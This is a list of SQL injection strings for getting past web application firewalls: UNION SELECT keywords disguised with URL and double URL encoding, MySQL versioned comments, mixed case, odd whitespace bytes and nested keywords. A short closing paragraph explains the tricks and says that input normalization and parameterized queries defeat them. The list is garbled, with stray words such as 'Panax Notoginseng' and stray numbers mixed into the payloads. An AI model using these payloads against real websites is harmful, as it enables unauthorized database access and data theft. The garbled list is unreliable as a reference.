1 #2 #3 #4 #WAF bypassing Strings:5 6 /*!%55nion*/ /*!%53elect*/7 8 %55nion (%53elect1,2,3)-- -9 Ten +Union+distinct+Select+ One A +Union+Distinctrow+Select+ - - /**//*!12345union SELECT*//**/ the - /**//*!50000union SELECT*//**/ - - /**/UNION/**//*!50000select*//**/ + - /*!50000union SeLeCt*/ + A Union /*!50000%53elect*/ at - +#UNiOn+#sEleCt - - +#1q%0AuNiOn All#qa%0a#%0AsEleCt - - /*!%55nion*/ /*!%53elect*/ in - /*!u%6eion*/ /*!se%6cect*/ to + +Un/**/Ion+Se/**/lect - theUni%0bon+Se%0blect * $ %2f**%2funion%2f**%2fselectPanax Notoginseng - Union%23foo*%2F*Bar%0D%0Aselect%23foo%0D%0A the + REVERSE(Noinu)+REVERSE(tceles) A the /*--*/Union/*--*/Select/*--*/ + - Union(/*!/**/ SeleCT */ 1,2,3) $ $ /*!union*/+/*!select*/ - - Union+/*!select*/ the - /**/Union/**/Select/**/Wuyi the /**/UNIon/**/sEleCt/**/ - Wu /**//*!union*//**//*!select*//**/ - About /*!union*/ /*! SelECt*/ $ - +Union+distinct+Select+ - - +Union+Distinctrow+Select+ A + +UnIOn%0d%0aSeleCt%0d%0a the - UNION/*&test=1*/SELECT/*&pwn=2*/ $ theUn?+Un/**/Ion+Se/**/Lect+ the the +Ununionion+Seselectlect+ the - +Uni%0bon+Se%0blect+ in the %252f%252a*/Union%252f%252a/Select%252f%252a*/ the About /%2 A%2 A/Union/%2 A%2 A/Select/%2 A%2 A/ the the %2f**%2funion%2f**%2fselect%2f**%2f the + Union%23foo*%2F*Bar%0D%0Aselect%23foo%0D%0A - the /*! UnIoN*/SeLecT+Bayi the ## the # - # -#Union Select byPASS withURL encoded Method: the the %55nion (%53elect) the the Union%20distinct%20Select - the Union% -%64istinctRO% $%20Select the the Union%2053elect94 the % at?%0auion% -?% at?%0aselect the the % at? Zen?%0Aunionall%23zen%0A%23Zen%0Aselect98 About %55nion%53eLEct - 101U%6eion SE%6cect102 103Unio%6e%73elect104 theUnio%6e% -%64istinc% About% -%73elect106 107Uni%6fndistinct%52OW s%65lect108 109 % the%6e%6f% the%6e% A%6c%6c% the% $%6c% $% the%7
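SQL injection: bypassing UNION SELECT keyword filtering

Nearly every entry in this list is the same `UNION SELECT` keyword pair in disguise. The disguises are mixed case, URL or double URL encoding, inline and MySQL versioned comments (`/*!50000 ... */`), alternative whitespace bytes, and keywords nested inside themselves so that a single strip pass reassembles them. They work only against filters that match literal keywords on the raw request. A filter that fully decodes and normalizes input before matching copes far better, and parameterized queries in the application remove the injection point regardless of what the filter misses.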